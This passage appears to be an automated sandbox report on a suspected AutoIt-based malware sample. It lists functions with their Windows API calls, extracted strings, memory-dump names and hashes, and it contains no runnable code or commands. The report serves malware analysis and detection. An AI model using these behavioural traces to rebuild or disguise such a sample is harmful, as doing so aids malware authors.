GetFileAttributesW.KERNELBASE(?,00E5E7C1), ref: 00E846A6
FindFirstFileW.KERNELBASE(?,?), ref: 00E846B7
FindClose.KERNEL32(00000000), ref: 00E846C7

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 0df30f18c65fa89034aeb6a65f112108fb989edbf0a2d8b6ef1529f1c72222ca
Instruction ID: 7e97d642588ef270ee3a47413c17e0939143927d72799b0ebbb3a48f39316fbc
Opcode Fuzzy Hash: 0df30f18c65fa89034aeb6a65f112108fb989edbf0a2d8b6ef1529f1c72222ca
Instruction Fuzzy Hash: EDE092714104015B46107778EC498EA769CDB0B335B100715F839E10E0E7B06D5496A5

Function 00E30B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E30BBB
timeGetTime.WINMM ref: 00E30E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E30FB3
TranslateMessage.USER32(?), ref: 00E30FC7
DispatchMessageW.USER32(?), ref: 00E30FD5
Sleep.KERNEL32(0000000A), ref: 00E30FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 00E3105A
DestroyWindow.USER32 ref: 00E31066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E31080
Sleep.KERNEL32(0000000A,?,?), ref: 00E652AD
TranslateMessage.USER32(?), ref: 00E6608A
DispatchMessageW.USER32(?), ref: 00E66098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E660AC

Strings

@COM_EVENTOBJ, xrefs: 00E6591A
@TRAY_ID, xrefs: 00E65BB9
@GUI_CTRLHANDLE, xrefs: 00E6540E
pr, xrefs: 00E65383
@GUI_CTRLID, xrefs: 00E65364
pr, xrefs: 00E65BDE
@GUI_WINHANDLE, xrefs: 00E653B9
pr, xrefs: 00E653D8
pr, xrefs: 00E6542D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
API String ID: 4003667617-1825247661
Opcode ID: 4838d6d192263f80b34fa9a8aedc5da18ddd54316f6b3753adc1eea8ba977e14
Instruction ID: 4895f8767c8c1671f82d195ead9010362db26b007fe75b1eee24eab6365e2eac
Opcode Fuzzy Hash: 4838d6d192263f80b34fa9a8aedc5da18ddd54316f6b3753adc1eea8ba977e14
Instruction Fuzzy Hash: 7EB2D271708741DFDB24DF24D894BAABBE4BF84348F14695DE49AB72A1CB70E844CB42

Function 00E893DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E891E9: __time64.LIBCMT ref: 00E891F3

Part of subcall function 00E25045: _fseek.LIBCMT ref: 00E2505D

__wsplitpath.LIBCMT ref: 00E894BE

Part of subcall function 00E4432E: __wsplitpath_helper.LIBCMT ref: 00E4436E

_wcscpy.LIBCMT ref: 00E894D1
_wcscat.LIBCMT ref: 00E894E4
__wsplitpath.LIBCMT ref: 00E89509
_wcscat.LIBCMT ref: 00E8951F
_wcscat.LIBCMT ref: 00E89532

Part of subcall function 00E8922F: _memmove.LIBCMT ref: 00E89268
Part of subcall function 00E8922F: _memmove.LIBCMT ref: 00E89277

_wcscmp.LIBCMT ref: 00E89479

Part of subcall function 00E899BE: _wcscmp.LIBCMT ref: 00E89AAE
Part of subcall function 00E899BE: _wcscmp.LIBCMT ref: 00E89AC1

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E896DC
_wcsncpy.LIBCMT ref: 00E8974F
DeleteFileW.KERNEL32(?,?), ref: 00E89785
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E8979B
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E897AC
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E897BE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 4f0ae976b2314c69eb5c0dda27adca830da270fedb4c44409f10bc7202fbb4fb
Instruction ID: 90a1c4ac61444cfb8d76f9892b2ae2c13bd5f3622c6195fe2458919d60e0f007
Opcode Fuzzy Hash: 4f0ae976b2314c69eb5c0dda27adca830da270fedb4c44409f10bc7202fbb4fb
Instruction Fuzzy Hash: 02C13CB1D00229AACF21EF95DD85EEEB7BCAF45300F0450AAF60DF6151EB309A449F65

Function 00E23015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E23074
RegisterClassExW.USER32(00000030), ref: 00E2309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E230AF
InitCommonControlsEx.COMCTL32(?), ref: 00E230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E230DC
LoadIconW.USER32(000000A9), ref: 00E230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E23101

Strings

0, xrefs: 00E23056
AutoIt v3 GUI, xrefs: 00E23090
+, xrefs: 00E2305D
TaskbarCreated, xrefs: 00E230A4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 9336427dc7b817964700d8e42a0384f28345c889a0633e01bbbe21262a96002b
Instruction ID: 411d4e4450b86f32eda90f03142a6d45ab08863dc5c068eaa1c855f6d0a0f8ea
Opcode Fuzzy Hash: 9336427dc7b817964700d8e42a0384f28345c889a0633e01bbbe21262a96002b
Instruction Fuzzy Hash: E43145B1800359AFEB108FE5EC85AC9BBF4FB09310F10412AF550BA2A0E3B51549CF90

Function 00E23041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E23074
RegisterClassExW.USER32(00000030), ref: 00E2309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E230AF
InitCommonControlsEx.COMCTL32(?), ref: 00E230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E230DC
LoadIconW.USER32(000000A9), ref: 00E230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E23101

Strings

0, xrefs: 00E23056
AutoIt v3 GUI, xrefs: 00E23090
+, xrefs: 00E2305D
TaskbarCreated, xrefs: 00E230A4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1b12381069524419010aa0829a3cf8e84d129c0777fa340499f93a99e5cc5f0c
Instruction ID: 2f9ff789f3ca8e77a829f3153fa85b69e777be65c025c9aefa639c5f5f99f0af
Opcode Fuzzy Hash: 1b12381069524419010aa0829a3cf8e84d129c0777fa340499f93a99e5cc5f0c
Instruction Fuzzy Hash: 3821C3B1910258AFDB10DFE6E889B9DBBF4FB1D750F00412AFA10BA2A0D7B155488F95

Function 00E271EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E24864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EE62F8,?,00E237C0,?), ref: 00E24882

Part of subcall function 00E4074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00E272C5), ref: 00E40771

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E27308
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E5ECF1
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E5ED32
RegCloseKey.ADVAPI32(?), ref: 00E5ED70
_wcscat.LIBCMT ref: 00E5EDC9

Strings

Software\AutoIt v3\AutoIt, xrefs: 00E272FE
\Include\, xrefs: 00E272C5
\, xrefs: 00E5EDEC
Include, xrefs: 00E5ECE8, 00E5ED29

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 7c919ff7cd33bb811bed3cc05d9eb3d3af728b13e455d2ef39b0afa35bf3c59e
Instruction ID: ee4ad9070805488afb305f52e16980f2b77f731efcfe67f560ebbe6390db8f0a
Opcode Fuzzy Hash: 7c919ff7cd33bb811bed3cc05d9eb3d3af728b13e455d2ef39b0afa35bf3c59e
Instruction Fuzzy Hash: B9716FB15083459EC314DF66EC8199BBBE8FF99340B44282EF685BB270EB30994DCB51

Function 00E23633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00E236D2
KillTimer.USER32(?,00000001), ref: 00E236FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E2371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E2372A
CreatePopupMenu.USER32 ref: 00E2373E
PostQuitMessage.USER32(00000000), ref: 00E2375F

Strings

%, xrefs: 00E5D2D1, 00E5D31F
TaskbarCreated, xrefs: 00E23725

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%
API String ID: 129472671-3835587964
Opcode ID: 9b5d63d0a4de819411740d84bafbfb422415c38f91ad6364abc542936485ccfb
Instruction ID: be34e28b07e2b6b237b9c7f7e8ba4d0db8b5b29590d9ccbcb99937eb0a7268b2
Opcode Fuzzy Hash: 9b5d63d0a4de819411740d84bafbfb422415c38f91ad6364abc542936485ccfb
Instruction Fuzzy Hash: B341B0B1104158BFDF249F75FC4DBBA3798E714340F04252AFA42B62F2CA68AD088B61

Function 00E23A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E23A62
LoadCursorW.USER32(00000000,00007F00), ref: 00E23A71
LoadIconW.USER32(00000063), ref: 00E23A88
LoadIconW.USER32(000000A4), ref: 00E23A9A
LoadIconW.USER32(000000A2), ref: 00E23AAC
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E23AD2
RegisterClassExW.USER32(?), ref: 00E23B28

Part of subcall function 00E23041: GetSysColorBrush.USER32(0000000F), ref: 00E23074
Part of subcall function 00E23041: RegisterClassExW.USER32(00000030), ref: 00E2309E
Part of subcall function 00E23041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E230AF
Part of subcall function 00E23041: InitCommonControlsEx.COMCTL32(?), ref: 00E230CC
Part of subcall function 00E23041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E230DC
Part of subcall function 00E23041: LoadIconW.USER32(000000A9), ref: 00E230F2
Part of subcall function 00E23041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E23101

Strings

0, xrefs: 00E23B06
AutoIt v3, xrefs: 00E23B17
#, xrefs: 00E23B0D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 46317543966a3da9f8b08fe814d61370662f0ba749975c6b05c623b326326596
Instruction ID: af59b9387566d0ddca27f2ef5e1ee45a52cad25ed257acf4f943be87987605a8
Opcode Fuzzy Hash: 46317543966a3da9f8b08fe814d61370662f0ba749975c6b05c623b326326596
Instruction Fuzzy Hash: EF213C71D10358AFDB109FA6EC89B9D7BB4EB1C751F00012AF604BE2B0D7B565588F94

Function 00E23778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b, xrefs: 00E5D44E
/AutoIt3OutputDebug, xrefs: 00E238A4
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00E237C0
/AutoIt3ExecuteLine, xrefs: 00E238B9
CMDLINE, xrefs: 00E23834
CMDLINERAW, xrefs: 00E2380D
/ErrorStdOut, xrefs: 00E2388F
/AutoIt3ExecuteScript, xrefs: 00E238CE

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
API String ID: 1825951767-3834736419
Opcode ID: 0e736ba07075f351cacb7a7170228def582f6d2835c70efe261de91326575f24
Instruction ID: c3e6ed7b7c1c2588a3a98d38b26b810f6a95bde520927328549364b8fcc4c18c
Opcode Fuzzy Hash: 0e736ba07075f351cacb7a7170228def582f6d2835c70efe261de91326575f24
Instruction Fuzzy Hash: 64A1507191023D9ADF14EBA0EC92DEEB7B8BF55310F04242AF516B7191DF746A09CB60

Function 00E2F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E403A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E403D3
Part of subcall function 00E403A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E403DB
Part of subcall function 00E403A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E403E6
Part of subcall function 00E403A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E403F1
Part of subcall function 00E403A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E403F9
Part of subcall function 00E403A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E40401

Part of subcall function 00E36259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E2FA90), ref: 00E362B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E2FB2D
OleInitialize.OLE32(00000000), ref: 00E2FBAA
CloseHandle.KERNEL32(00000000), ref: 00E649F2

Strings

%, xrefs: 00E2F8F6, 00E2F908, 00E2FACE, 00E2FBB1
\d, xrefs: 00E2F957
c, xrefs: 00E2F94B
<g, xrefs: 00E2FA90

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <g$\d$%$c
API String ID: 1986988660-619945097
Opcode ID: 410f02042760e12e8f69c24ba5109d25b06b11108e5c2b76983a4cda0af83c71
Instruction ID: 79bd30eae3fbbf2dbc707aa7352406e5d7fa0542ed110129c55cea59406de50e
Opcode Fuzzy Hash: 410f02042760e12e8f69c24ba5109d25b06b11108e5c2b76983a4cda0af83c71
Instruction Fuzzy Hash: 9081ADB09002D88FC794DF6BA9956157AF5FBA8398710953AF028FF2A5EB31540CCF51

Function 01912780 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01912851
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01912A77

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 171b8c1365f681460c525d12d9a0d8d0f60460bef96d68004ee9077914fdd740
Instruction ID: 9fbcecaca3a8b6cf22eb12edfb03f5fd4055eea7bc71a2e77e6aab0488e64bab
Opcode Fuzzy Hash: 171b8c1365f681460c525d12d9a0d8d0f60460bef96d68004ee9077914fdd740
Instruction Fuzzy Hash: B2A13970E0020DEBDB14DFA8C994BEEBBB5BF48305F208559E509BB284C7759A81CB65

Function 00E239E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E23A15
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E23A36
ShowWindow.USER32(00000000,?,?), ref: 00E23A4A
ShowWindow.USER32(00000000,?,?), ref: 00E23A53

Strings

edit, xrefs: 00E23A30
AutoIt v3, xrefs: 00E23A0D, 00E23A12, 00E23A13

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2a4fdd30e45754e38592300efb60be70245a58d8625fea9e538e0844eecdd5d0
Instruction ID: 306e53993d34a54d9b0d1e0f101a759f06b2e4fad634938c7b2a2ca8acb0525c
Opcode Fuzzy Hash: 2a4fdd30e45754e38592300efb60be70245a58d8625fea9e538e0844eecdd5d0
Instruction Fuzzy Hash: 93F03A706002D87EEA301763AC89E773E7DD7DFFA0B00002AFA00BA170C2A52844CAB0

Function 019124E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 172
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0191266B
VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 019126A0
ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 019126C3
ExitProcess.KERNEL32(00000000), ref: 01912724

Strings

5S4KDMN2WEVIUJEQE8MXOG74AV, xrefs: 019126CE, 019126D1

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: File$AllocCreateExitProcessReadVirtual
String ID: 5S4KDMN2WEVIUJEQE8MXOG74AV
API String ID: 1333605300-493344706
Opcode ID: ac01cbefc8eefada80ebc31f762c22319b1bd8815bf83c84f38c5d6d63e3e989
Instruction ID: 5e1c367e98a0ef7ab78eb0ef7cb1a7321ac63c671ea20c46d0aa1db86b2bc10d
Opcode Fuzzy Hash: ac01cbefc8eefada80ebc31f762c22319b1bd8815bf83c84f38c5d6d63e3e989
Instruction Fuzzy Hash: 4C71B530D0428CDAEF11EBB4C804BEFBB79AF15304F144499E648BB2C5D7B95A85CB65

Function 00E2410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E5D5EC

Part of subcall function 00E27D2C: _memmove.LIBCMT ref: 00E27D66

_memset.LIBCMT ref: 00E2418D
_wcscpy.LIBCMT ref: 00E241E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E241F1

Strings

Line: , xrefs: 00E5D615

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 057fc5e10a141dc1317538668ae930d180d7f7924894b877f447eb50d2506e99
Instruction ID: 58193693ebfc2b038c1bc675dfb20f5bef6ea5ba7a8baf49c11e06a01905b52f
Opcode Fuzzy Hash: 057fc5e10a141dc1317538668ae930d180d7f7924894b877f447eb50d2506e99
Instruction Fuzzy Hash: 8631B5B10093689ED721EB60EC46BDB77E8AF58304F10691EF5D5B60E1EF70A648C792

Function 00E4564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

